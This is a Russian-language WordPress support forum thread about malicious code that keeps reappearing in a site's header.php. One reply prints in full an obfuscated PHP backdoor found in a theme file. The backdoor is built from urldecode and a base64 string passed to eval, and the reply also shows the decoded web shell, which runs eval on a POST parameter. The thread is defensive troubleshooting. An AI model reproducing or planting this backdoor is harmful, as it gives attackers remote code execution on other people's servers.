• Добрый день,
    Регулярно в header.php появляется вредоносный код.

    Вход на сайт осуществляется только после авторизации, пароли берутся с Active Directory.

    Путь к wp-login изменен, логин не стандартный администратора, пароль не простой.

    Порт на ftp изменен на не стандартный.

    Грешу на какой то плагин (все ставились с репозитария wp), не хотелось бы отключать все плагины и ждать неделю (вредоносный код появляется раз в неделю, понедельник, пятница).

    Хостинг личный, на linux.

    Подскажите куда рыть смотреть, впервые столкнулся с вирусом(?) на сайте.

Просмотр 3 ответов — с 1 по 3 (всего 3)
  • Сначала поискать этот код в исходниках (плагины, темы ).
    Если нет, то копать глубже.
    Искать eval(), base64_decode(), url_decode() и тд

    вот пример трояна. встроен был в function.php темы
    $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));

    что превращается в

    <?php
    $fukq = @$_GET['fukq'];
    if($fukq == 't'){
      echo(@eval($_POST['fuckyou4321']));
      exit;
      }
    echo apiRequest();
    function apiRequest(){
        if(@$_GET['op'] == 'check')
            {
             return "connectjbmoveisok";
             exit();
            }
    }
    ?>

    В таком случае лучше использовать какой-нибудь антивирус для вордпресс(Sucuri например)
    Кончено у меня он пока не замечал, но наверное, заметит…

    Sucuri
    Указал на уязвимость xss
    по его рекомендации поставил в .htaccess

    <IfModule mod_headers.c>
      Header set X-XSS-Protection "1; mode=block"
      Header set X-Content-Type-Options nosniff
    </IfModule>

    Буду наблюдать

Просмотр 3 ответов — с 1 по 3 (всего 3)
  • Тема «вредоносный код в header.php» закрыта для новых ответов.